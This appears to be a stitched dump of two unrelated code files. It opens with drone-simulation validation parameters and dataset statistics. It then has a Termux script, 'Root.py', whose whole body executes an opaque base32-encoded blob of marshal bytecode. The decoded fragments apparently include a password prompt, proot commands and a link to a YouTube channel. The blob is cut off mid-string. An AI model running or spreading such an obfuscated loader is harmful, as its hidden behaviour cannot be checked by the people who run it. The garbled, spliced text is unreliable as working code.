'batterytechnology': 'current'
},
{
'dronename': 'drone',
'stateofhealth': 100.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 0.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'payload',
'ylabel': 'endurance',
'title': 'FreeFLY_Alta8',
'simulationtype': 'simple',
'xbegin': 0.0,
'xend': 1.0,
'xnumber': 20,
'validation': False,
'validationcase': 'FireFLY6Pro',
'batterytechnology': 'current'
},
{
'dronename': 'drone',
'stateofhealth': 90.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 0.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'payload',
'ylabel': 'power',
'title': 'First_test',
'simulationtype': 'simple',
'model': 'abdilla',
'xbegin': 0.5,
'xend': 1.5,
'xnumber': 10,
'validation': False,
'validationcase': 'Dorling2017_3S',
'batterytechnology': 'current'
},
{
'dronename': 'drone',
'stateofhealth': 90.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 0.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'payload',
'ylabel': 'power',
'title': 'First_test',
'simulationtype': 'simple',
'model': 'abdilla',
'xbegin': 0.5,
'xend': 1.5,
'xnumber': 10,
'validation': False,
'validationcase': 'Dorling2017_4S',
'batterytechnology': 'current'
},
{
'dronename': 'drone',
'stateofhealth': 100.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 0.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'missionspeed',
'ylabel': 'power',
'title': 'DiFranco',
'simulationtype': 'simple',
'model': 'abdilla',
'xbegin': 0.0,
'xend': 16.0,
'xnumber': 20,
'validation': False,
'validationcase': 'DiFranco2016',
'batterytechnology': 'current'
},
{
'dronename': 'drone',
'stateofhealth': 100.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 0.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'missionspeed',
'ylabel': 'power',
'title': 'Stolaroff',
'simulationtype': 'simple',
'model': 'abdilla',
'xbegin': 0.0,
'xend': 16.0,
'xnumber': 20,
'validation': False,
'validationcase': 'Chang2016',
'batterytechnology': 'current'
},
{
'dronename': 'drone',
'stateofhealth': 90.0,
'startstateofcharge': 100.0,
'altitude': 100.0,
'temperaturesealevel': 15.0,
'rain': False,
'dropsize': 0.0,
'liquidwatercontent': 1.0,
'temperature': 15.0,
'wind': False,
'windspeed': 0.0,
'winddirection': 0.0,
'relativehumidity': 0.0,
'icing': False,
'timestep': 1,
'plot': True,
'xlabel': 'payload',
'ylabel': 'endurance',
'title': 'Abdilla 2015 Endurance vs Payload Validation Test',
'simulationtype': 'simple',
'model': 'abdilla',
'xbegin': 0.4,
'xend': 0.55,
'xnumber': 20,
'validation': False,
'validationcase': 'Abdilla2015endurance',
'batterytechnology': 'current'
}
]
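# Hypothetical smoke check (not part of drone_awe): confirm each validation
# case carries the fields a plotting run reads; key names come from the dicts above.
if __name__ == '__main__':
    for case in params:
        assert {'title', 'xlabel', 'ylabel', 'validationcase'} <= case.keys()
        print(case['title'], '->', case['validationcase'])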
| 19.942748 | 61 | 0.666029 | 605 | 5,225 | 5.742149 | 0.117355 | 0.022453 | 0.069948 | 0.059585 | 0.905584 | 0.883708 | 0.86327 | 0.850892 | 0.850892 | 0.850892 | 0 | 0.077217 | 0.097799 | 5,225 | 262 | 62 | 19.942748 | 0.659737 | 0 | 0 | 0.843511 | 0 | 0 | 0.561424 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0d5afb200498f723318d3f7b95850079386a9963 | 16,702 | py | Python | Root.py | SidraELEzz/Basic | 022bbcc3c418f694a9c3e86ae73ed8d220393936 | ["MIT"] | 13 | 2021-01-30T14:56:24.000Z | 2022-03-05T16:59:47.000Z | Root.py | SidraELEzz/Basic | 022bbcc3c418f694a9c3e86ae73ed8d220393936 | ["MIT"] | null | null | null | Root.py | SidraELEzz/Basic | 022bbcc3c418f694a9c3e86ae73ed8d220393936 | ["MIT"] | 1 | 2021-02-22T09:01:10.000Z | 2021-02-22T09:01:10.000Z |
#Coded By Sidra ELEzz 2021
#YouTube :Termux Tools
#Telegram:@SS_SS_1
import base64
exec(base64.b32decode('ENBW6ZDFMQQEE6JAKRSWOYLSEBEUICTJNVYG64TUEBWWC4TTNBQWYCTFPBSWGKDNMFZHG2DBNQXGY33BMRZSQJ3DLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGNOHQMBQLR4DAMC4PAYDAQC4PAYDAXDYGAYFY6BQGBZSCXDYGAYFY6BQGBOHQMBQMROHQMBQLR4DAMDELR4DAMK4PAYDA3C4PAYDAXDYGAYFUXDYGAYFY6BQGBSVY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMS4PAYDAXDYHAZVY6BQGFOHQMBQMROHQMBRLR4DAMC4PAYDIVLELR4DAMK4PAYDAUZILR4DAM24PAYDAXDYGAYFY6BQGBUVY6DGMZOHQZTGLR4GMZS4PBTGMTTTLR4GCYS4PAYGMXDYGAYFY6BQGBRVY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDGXDYGAYFY6BQGBOHQMBQIBOHQMBQLR4DAMC4PAYDA4ZBLR4DAMC4PAYDAXDYGAYGIXDYGAYFY6BQGBSFY6BQGFOHQMBQNROHQMBQLR4DAMC2LR4DAMC4PAYDAZK4PAYDAXDYGAYGUXDYGAYVY6BQGBSFY6BQGJOHQMBQLR4DQM24PAYDCXDYGAYGIXDYGAYVY6BQGBOHQMBUKVSFY6BQGFOHQMBQKMUFY6BQGNOHQMBQLR4DAMC4PAYDA2K4PBTGMXDYMZTFY6DGMZOHQZTGJZZVY6BRGROHQMDGLR4DAMC4PAYDAY24PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBTLR4DAMC4PAYDAXDYGAYEAXDYGAYFY6BQGBOHQMBQOMQVY6BQGBOHQMBQLR4DAMDELR4DAMC4PAYDAZC4PAYDCXDYGAYGYXDYGAYFY6BQGBNFY6BQGBOHQMBQMVOHQMBQLR4DAMDKLR4DAMK4PAYDAZC4PAYDEXDYGAYFY6BYGNOHQMBRLR4DAMDELR4DAMK4PAYDAXDYGA2FKZC4PAYDCXDYGAYFGKC4PAYDGXDYGAYFY6BQGBOHQMBQNFOHQZTGLR4GMZS4PBTGMXDYMZTE4435LR4DAZK4PAYDAXDYGAYGGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHGXDYMU3FY4S4PAYDAXDYGAYGGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHGT24OJOHQMBQLR4DAMDDLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGNOHQMBQLR4DAMC4PAYDAQC4PAYDAXDYGAYFY6BQGBZSCXDYGAYFY6BQGBOHQMBQMROHQMBQLR4DAMDELR4DAMK4PAYDA3C4PAYDAXDYGAYFUXDYGAYFY6BQGBSVY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMS4PAYDAXDYHAZVY6BQGFOHQMBQMROHQMBRLR4DAMC4PAYDIVLELR4DAMK4PAYDAUZILR4DAM24PAYDAXDYGAYFY6BQGBUVY6DGMZOHQZTGLR4GMZS4PBTGMTTTLR4GEOC4PAYGGXDYGAYFY6BQGBRVY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDGXDYGAYFY6BQGBOHQMBQIBOHQMBQLR4DAMC4PAYDA4ZBLR4DAMC4PAYDAXDYGAYGIXDYGAYFY6BQGBSFY6BQGFOHQMBQNROHQMBQLR4DAMC2LR4DAMC4PAYDAZK4PAYDAXDYGAYGUXDYGAYVY6BQGBSFY6BQGJOHQMBQLR4DQM24PAYDCXDYGAYGIXDYGAYVY6BQGBOHQMBUKVSFY6BQGFOHQMBQKMUFY6BQGNOHQMBQLR4DAMC4PAYDA2K4PBTGMXDYMZTFY6DGMZOHQZTGJZZSCXDYGBRVY6BQGBOHQMBQMNOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAZVY6BQGBOHQMBQLR4DAMCALR4DAMC4PAYDAXDYGAYHGIK4PAYDAXDYGAYFY6BQGBSFY6BQGBOHQMBQMROHQMBRLR4DAMDMLR4DAMC4PAYDAWS4PAYDAXDYGAYGKXDYGAYFY6BQGBVFY6BQGFOHQMBQMROHQMBSLR4DAMC4PA4DGXDYGAYVY6BQGBSFY6BQGFOHQMBQLR4DANCVMROHQMBRLR4DAMCTFBOHQMBTLR4DAMC4PAYDAXDYGAYGSXDYMZTFY6DGMZOHQZTGLR4GMZSOONOHQODBLR4DAYS4PAYDAXDYGAYGGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHGXDYMYZVY3S4PAYDAXDYGAYGGXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAM24PAYDAXDYGAYFY6BQGBAFY6BQGBOHQMBQLR4DAMDTEFOHQMBQLR4DAMC4PAYDAZC4PAYDAXDYGAYGIXDYGAYVY6BQGBWFY6BQGBOHQMBQLJOHQMBQLR4DAMDFLR4DAMC4PAYDA2S4PAYD
CXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BQGRKWIXDYGAYVY6BQGBJSQXDYGAZVY6BQGBOHQMBQLR4DAMDJLR4GMZS4PBTGMXDYMZTFY6DGMZHHGXC4LRXFY6BQGBOHQMBQMNOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAZVY6BQGBOHQMBQLR4DAMCALR4DAMC4PAYDAXDYGAYHGIK4PAYDAXDYGAYFY6BQGBSFY6BQGBOHQMBQMROHQMBRLR4DAMDMLR4DAMC4PAYDAWS4PAYDAXDYGAYGKXDYGAYFY6BQGBVFY6BQGFOHQMBQMROHQMBSLR4DAMC4PA4DGXDYGAYVY6BQGBSFY6BQGFOHQMBQLR4DANCVMROHQMBRLR4DAMCTFBOHQMBTLR4DAMC4PAYDAXDYGAYGSXDYMZTFY6DGMZOHQZTGLR4GMZSOONOHQYZVLR2FY6BQGBOHQMBQMNOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAZFY6BQGBOHQMBQLR4DAMCALR4DAMC4PAYDAXDYGAYHGXDYMM3FY6BQGBOHQMBQLR4DAMDELR4DAMC4PAYDAWS4PAYDAXDYGAYGIXDYGAYFY6BQGBNFY6BQGFOHQMBQMROHQMBRLR4DAMC2LR4DAMS4PAYDA6DZLR4DAMDFLR4DAMS4PAYDAZC4PAYDCXDYGAYGWXDYGAZFY6BQGBZFY6BYMROHQMBQMVOHQMBTLR4DAMDELR4DAMS4PAYDAXDYHAZVY6BQGFOHQMBQLJOHQMBULR4DAMDFLR4DANC4PAYDAZK4PAYDAXDYGAYGWXDYGAZFY6BQGBZHQXDYGAYGKXDYGAZVY6BQGBSFY6BQGNOHQMBQLR4DQM24PAYDCXDYGAYFUXDYGA2VY6BQGBSVY6BQGVOHQMBQMVOHQMBRLR4DAMDLLR4DAMS4PAYDA4TDLR4DAMDELR4DANC4PAYDAZK4PAYDIXDYGAYFY6BRG5DUQZC4PAYDKXDYGAYFUXDYGAZFY6BQGBYVY6BYMFOHQMBQMROHQMBWLR4DAMCHJBSVY6BQGZOHQMBQNJOHQMBXLR4DAMDELR4DAN24PAYDAXDYHAZVY6BQGFOHQMBQLR4DAMLRLR4DCNK4PAYDAZC4PAYDQXDYGAYEOSDFLR4DANS4PAYDA2S4PAYDOXDYGAYGIXDULR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBROFOHQMJVLR4DAMCXMROG4XDYGAYGIXDYGBRFY6BQGBWFY6BQGZOHQMBQLJOHQMBWLR4DAMDELRXFY6BQGBSFY6BQMJOHQMBQNROHQMBYLR4DAMC2LR4DAOC4PAYDAZC4NZOHQMBQMROHQMDCLR4DAMDMLR2FY6BQGBNFY5C4PAYDAZC4PAYGGXDYGAYFY6BYGROHQMBQLR4DAMC2LRXFY6BQGBSVY3S4PAYDAXDYHAZVY6BQGBOHQMBQLR4DAMLELR4DAYS4PAYDAUZILRZFY6BQGBOHQMBQLR4DAMDULRXFY6BQGBOHQMBQLR4DAMCTNFSHEYLFNRSXU6TULR4DANC4PAYDAXDYGAYFY6BQGB2HE5LFOMTFY6BQGBOHQMBQLR4DAMC4PAYWEWZRHM4TM3K3LR4DCYK5EBOHQMLCLMYTWOJXNVKVGRKSEBEUIIC4PAYWEWZRHM4TM3J6HY7D4IDTLQTVY6BQGBOHQMBQLR4DAMC4PAYWEWZRHM4TM3K3LR4DCYK5EBOHQMLCLMYTWOJXNVIECU2TK5HVERBALR4DCYS3GE5TSNTNHY7D4PRAONOHQMLBLR4DAMC4PAYDAXDYGAYEY33HM5SWIIDJNYQHG5LDMNSXG43GOVWGY6JAMFZSA5C4PAYDKXDYGAYFY6BQGBOHQMBQMZQWY43FONOHQMDFLR4DAMC4PAYDAXDYGAYFO4TPNZTSAUDBONZXO33SMRZT2XDYGAYFY6BQGBOHQMBQPBSGOLLPOBSW4IDIOR2HA4Z2F4XXS33VOR2WEZJOMNXW2L3DNBQW43TFNQXVKQ32IZ3GSRSZINHUUSJUJF3WQZCWJ5IVI4KJO5ZVY6BQMVOHQMBQLR4DAMC4PAYDAV3SN5XGOICVONSXE3TBNVSXGXDYGFSFY6BQGBOHQMBQLR4DAMDYMRTS233QMVXCA2DUORYHGORPF52C43LFF5JVGX2TKNPTC2K4PBTGMXDYMZTFY6DGMZOHQZTGJZRVY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYVY6BQGBOHQMBQLR4DAMC4PAYDEXDYGAYFY6BQGBOHQMBQINOHQMBQLR4DAMC4PAYDA424PAYGGXDYGAZFY6BQGBOHQMBQOROHQMBQLR4DAMDKLR4DAMK4PAYDAZC4PAYDCXDYGAYFY6BYGNOHQMBRLR4DAMC4PAYDC5C4PAYDEXDYGAYGUXDYGAZVY6BQGBSFY6BQGJOHQMBQLR4DQM24PAYDCXDYGAYFY6BQGFSFY6BQGNOHQMBQI5EHIXDYGAZFY6BQGBVFY6BQGNOHQMBQMROHQMBULR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBRMROHQMBVLR4DAMCHJBSFY6BQGZOHQMBQI5EGIXDYGA3VY6BQGBDUQZC4PAYDQXDYGAYEOSDULR4DAMS4PAYDA2S4PAYDGXDYGAYGIXDULR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBRMROHQMBVLR4DAMCHJBSFY3S4PAYDAR2IMROHQMDCLR4DAMCHJBSFY6BQMNOHQMBQI5EGIXDSLR4DAMCHJBSFY6BQMVOHQMBQI5EGIXDYGBTFY6BQGBDUQZC4PAYTAXDYGAYEOSDULR4DANC4PAYDAZC4PAYTCXDYGAYFY6BYGNOHQMBRLR4DAMD5LR4DAMC4PAYDA7C4PAYDAXDYGAYGII24PAYDA224PAYDMXDYGAYHEXDYMJSVY6BQGB2FY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMK4PAYDAXDYHAZVY6BQGFOHQMBQLR4DAMLULR4DAMS4PAYDA2S4PAYDGXDYGAYGIXDYGAZFY6BQGBOHQOBTLR4DAMK4PAYDAXDYGAYXIXDYGAZFY6BQGBVFY6BQGNOHQMBQMROHQMJTLR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBROROHQMBVLR4DAMC4PA4DGXDYGAYFY6BQGBOHQMBRNZOHQMBQLR4DAMD4LR4DAMC4PAYDAZBELR4DAMDLLR4DANS4PAYDA4RCLR4DAMLULR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAYVY6BQGBOHQOBTLR4DAMK4PAYDAXDYGAYXIXDYGAZFY6BQGBVFY6BQGNOHQMBQMROHQMJVLR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBROROHQMBSLR4DAMDKLR4DAM24PAYDAZC4PAYTMXDYGAYFY6BYGNOHQMBRLR4DAMC4PAYDC5C4PAYDEXD
YGAYGUXDYGAZVY6BQGBSFY6BQGJOHQMBQLR4DQM24PAYDCXDYGAYFY6BQGF2FY6BQGJOHQMBQNJOHQMBTLR4DAMDELR4DCN24PAYDAXDYHAZVY6BQGFOHQMBQLR4DAMLULR4DAMS4PAYDA2S4PAYDGXDYGAYGIXDYGE4FY6BQGBOHQOBTLR4DAMK4PAYDAXDYGAYXIXDYGA2VY6BQGBOHQOBTLR4DAMC4PAYDAXDYGAYW4XDYGAYFY6BQGB6FY6BQGBOHQMBQMQSVY6BQGBVVY6BQGZOHQMBQOJJFY6BQGF2FY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMK4PAYDAXDYHAZVY6BQGFOHQMBQLR4DAMLULR4DAMS4PAYDA2S4PAYDGXDYGAYGIXDYGFQVY6BQGBOHQOBTLR4DAMK4PAYDAXDYGAYXIXDYGA2VY6BQGBOHQOBTLR4DAMC4PAYDAXDYGAYW4XDYGAYFY6BQGB6FY6BQGBOHQMBQMQTFY6BQGBVVY6BQGZOHQMBQOJOHQOBSLR4DAMLULR4DAMC4PAYDA2S4PAYDCXDYGAYGIXDYGAYVY6BQGBOHQOBTLR4DAMK4PAYDAXDYGAYXIXDYGAZFY6BQGBVFY6BQGNOHQMBQMROHQMLDLR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBROROHQMBVLR4DAMC4PA4DGXDYGAYFY6BQGBOHQMBRNZOHQMBQLR4DAMD4LR4DAMC4PAYDAZC4E5OHQMBQNNOHQMBWLR4DAMDSLR4GEMS4PAYDC5C4PAYDAXDYGAYGUXDYGAYVY6BQGBSFY6BQGFOHQMBQLR4DQM24PAYDCXDYGAYFY6BQGF2FY6BQGJOHQMBQNJOHQMBTLR4DAMDELR4DCZK4PAYDAXDYHAZVY6BQGFOHQMBQLR4DAMLULR4DANK4PAYDAXDYHAZVY6BQGBOHQMBQLR4DAMLOLR4DAMC4PAYDA7C4PAYDAXDYGAYGIKC4PAYDA224PAYDMXDYGAYHEXDYMUZFY6BQGF2FY6BQGBOHQMBQNJOHQMBRLR4DAMDEEBOHQMBQLR4DQM24PAYDCXDYGAYFY6BQGF2FY6BQGJOHQMBQNJOHQMBTLR4DAMDEEFOHQMBQLR4DQM24PAYDCXDYGAYFY6BQGF2FY6BQGVOHQMBQLR4DQM24PAYDAXDYGAYFY6BQGFXCMXDYGAYHIXDYGAYFY6BQGBVFY6BQGFOHQMBQMROHQMBRLR4DAMC4PA4DGXDYGAYVY6BQGBOHQMBRMQRFY6BQGBDUQ5C4PAYDAXDYGAYGUXDYGAYVY6BQGBSFY6BQGFOHQMBQLR4DQM24PAYDCXDYGAYFY6BQGF2FY6BQGZOHQMBQLR4DQM24PAYDAXDYGAYFY6BQGFSFY6BQGBOHQMBQKMUCSXDYGAYFY6BQGBOHQMBQJZUVY6BQGFOHQMBQLR4DAMC4PAYDA5C4PAYDKXDYGAYFY6BQGBOHQMBQMNWGKYLSONOHQMBVLR4DAMC4PAYDAXDYGAYFY6BRMJNTSM3NONOHEXDYGAYFY6BQGBOHQMBQMZUWO3DFOQQFG2LEOJQSA4ZGLR4DAMC4PAYDAXDYGAYFY6BRMJNTSMTNHU6T2PJ5HU6T2PJ5HU6T2PJ5HU6T2PJ5HU6T2PJ5HU6T2PJ5HU6T24ZALR4DAMC4PAYDAXDYGAYFY6BRMJNTSM3NEBAXK5DIN5ZCAIBAHJOHQMLCLM4TE3KTNFSHEYJAIVGEK6T2OMRFY6BQGBOHQMBQLR4DAMC4PAYWEWZZGNWSAWLPOVKHKYTFEAQDUIC4PAYWEWZZGJWVIZLSNV2XQICUN5XWY43TFBOHQMBQLR4DAMC4PAYDAXDYGFRFWOJTNUQFIZLMMVTXEYLNEA5CAXDYGFRFWOJSNVUHI5DQOM5C6L3UFZWWKL2UKRPVEULTHVOHQMBQLR4DAMC4PAYDA6DEM4WW64DFNYQGQ5DUOBZTULZPPFXXK5DVMJSS4Y3PNUXWG2DBNZXGK3BPKVBXURTWNFDFSQ2PJJETISLXNBSFMT2RKRYUS53TFZOHQMBQLR4DAMC4PAYDAXDYGFRFWOJSNUVSWKZLFMVSWKZLFMVSWIC4PAYWEWZZG5WVIT2PJRJSAXDYGFRFWOJSNUVSWKZLFMVSWKZLFMVSW4ZLLR4DAMC4PAYDAXDYGAYFY6BRMJNTSMTNLNOHQMLCLM4TO3JRLR4DCYS3HEZG2XJALR4DCYS3HEZW2RLOMFRGYZJAMFZHE33XEBVWK6LTEAQHGKC4PAYDAXDYGAYFY6BQGBOHQMLCLM4TE3K3LR4DCYS3HE3W2MS4PAYWEWZZGJWV2IC4PAYWEWZZGNWVE33POQQGCY3UNF3GC5DJN5XCA4ZPLR4DAMC4PAYDAXDYGAYFY6BRMJNTSMTNLNOHQMLCLM4TO3JTLR4DCYS3HEZG2XJALR4DCYS3HEZW2RTPNRWG65ZANVSSA33OEBKGK3DFM5ZGC3JAEBZSWXDYGAYFY6BQGBOHQMBQLR4DCYS3HEZG2W24PAYWEWZZG5WTIXDYGFRFWOJSNVOSAXDYGFRFWOJTNVDG63DMN53SA3LFEBXW4IDHNF2GQ5LCOMXFY6BQGBOHQMBQLR4DAMC4PAYWEWZZGJWVWXDYGFRFWOJXNU2VY6BRMJNTSMTNLUQFY6BRMJNTSM3NIZXXEIDJNZYXK2LSNFSXGIDDMFWGYIDNMUQHGXDYGFSFY6BQGBOHQMBQLR4DAMC4PAYWEWZZGJWVWXDYGFRFWOJRNUYFY6BRMJNTSMTNLUQFY6BRMJNTSMLNIV4GS5BAONOHQMDFLR4DAMC4PAYDAXDYGAYFY6BRMJNTSN3NHU6T4XDYGFRFWOJTNUQHIXDYGAYVY6BQGBOHQMBQLR4DAMBRONOHQMDFLR4DAMC4PAYDAXDYGAYHA6LUNBXW4MRANNSXSLTQPF2FY6BQGFOHQMBQLR4DAMC4PAYDAMTTLR4DAZS4PAYDAXDYGAYFY6BQGBQXA5BANFXHG5DBNRWCA5DTOV2FY6BQGNOHQMBQLR4DAMC4PAYDA5DTOVZVY6BRGFOHQMBQLR4DAMC4PAYDA4DLM4QGS3TTORQWY3BAOBZG633UONOHQMLFLR4DAMC4PAYDAXDYGAYHA4TPN52CALJQEAWXOID6EASFAUSFIZEVQL3CNFXC6YTBONUHIXDYGAYVY6BQGBOHQMBQLR4DAMBTONOHQMLELR4DAMC4PAYDAXDYGAYHQZDHFVXXAZLOEBUHI5DQOM5C6L3UFZWWKL2UKRPVEUJPGR2FY6BQGFOHQMBQLR4DAMC4PAYDANDTEZOHQMBQLR4DAMC4PAYDA6DEM4WW64DFNYQGQ5DUOBZTULZPM5UXI2DVMIXGG33NF5JWSZDSMFCUYRL2PJ2FY6BQGFOHQMBQLR4DAMC4PAYDANLTLR4DCZC4PAYDAXDYGAYFY6BQGB4GIZZNN5YGK3RANB2HI4DTHIXS65BONVSS6U2TL5JVGXZROROHQMBRLR4DAMC4PAYDAXDYGAYDA2K4PA
YDEXDYGAYFY6BQGBOHQMBQONOHQMJRLR4DAMC4PAYDAXDYGAYGM2LHNRSXIICTNFSHEYLFNRSXU6TTFBOHQMBQLR4DAMC4PAYDAXDYGFRFWOJXNUQFA2LMNFUCAWLBNZTSAQTFNZSXEIC4PAYWEWZZGJWUO33CNRXWWIBOEAXCALRILR4DAMK4PAYDAXDYGAYFY6BQGBJFY6BQGROHQMBQLR4DAMC4PAYDAKC4PAYDCXDYGAYFY6BQGBOHQMBQKJOHQMBVLR4DAMC4PAYDAXDYGAYCQXDYGAYVY6BQGBOHQMBQLR4DAMCSLR4DAN24PAYDAXDYGAYFY6BQGAUFY6BQGFOHQMBQLR4DAMC4PAYDAUS4PAYDQXDYGAYFY6BQGBOHQMBQFBOHQMBRLR4DAMC4PAYDAXDYGAYFEXDULR4DAMC4PAYDAXDYGAYCQXDYGAYVY6BQGBOHQMBQLR4DAMCSLRXFY6BQGBOHQMBQLR4DAMBILR4DAN24PAYDAXDYGAYFY6BQGB2FY6BQGROHQMBQLR4DAMC4PAYDA5DJNVSXIXDYGA2VY6BQGBOHQMBQLR4DAMDTNRSWK4DULR4DAMS4PAYDAXDYGAYFY6BQGBXXG5C4PAYDMXDYGAYFY6BQGBOHQMBQON4XG5DFNV2FY5C4PAYDAXDYGAYFY6BQGBZGC527NFXHA5LUOROHQMBULR4DAMC4PAYDAXDYGAYGK6DJOR2FY6BQGROHQMBQLR4DAMC4PAYDA3LBNFXCQXDYGAYVY6BQGBOHQMBQLR4DAMDULR4DANC4PAYDAXDYGAYFY6BQGBTWC3TTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR2FY6BQGBOHQMBQLR4DAMB4ORSWOYLSNFSD4US4PAYTCXDYGAYFY6BQGBOHQMBQLR4DCOK4PAYDAXDYGAYFY6BQGBZWMXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDCXDSLR4DAMK4OJOHQMBRLR4DANK4PAYDCXDSLR4DAMK4PAYDKXDYGAYVY6BQGVOHQMBRLR4DANK4PAYDCXDYGA2VY6BQGFOHEXDYGAYVY6BQGVOHQMBRLR4DANK4PAYDCXDYGA2VY6BQGFOHQMBVLR4DAMK4PAYDKXDYGAYVY6BQGVOHQMBRLR4DANK4PAYDCXDYGA2VY6BQGFOHQMDDLR4DAMK4PAYGGXDYGAYVY4S4PAYDCXDSLR4DAMK4OJOHQMBRLRXFY6BQGFOHQMDDLR4DAMK4OJOHQMBRLRZFY6BQGFOHEXDYGAYVY4S4PAYDCXDSLR4DAMK4OJOHQMBRLRXFY6BQGFOHQMDDLR4DAMK4OJOHQMBRLRZFY6BQGFOG4XDYGAYVY6BQMNOHQMBRLRZFY6BQGFOHEXDYGAYVY3S4PAYDCXDYGBRVY6BQGFOHEXDYGAYVY4S4PAYDCXDOLR4DAMK4PAYGGXDYGAYVY4S4PAYDCXDSLR4DAMK4NZOHQMBSLRZFY6BQGFOHQMBVLR4DAMK4OJOHQMBRFBOHQMDCLR4DAMC4PAYDAXDYGAYHIXDYGBTFY6BQGBOHQMBQLR4DAMCDN5ZHEZLDORKXGZLSNZQW2ZLULR4DAZS4PAYDAXDYGAYFY6BQGBBW64TSMVRXIUDBONZXO33SMR2FY6BQGROHQMBQLR4DAMC4PAYDA3DPN5YFEXDYGBTFY6BQGBOHQMBQLR4DAMDULR4DAO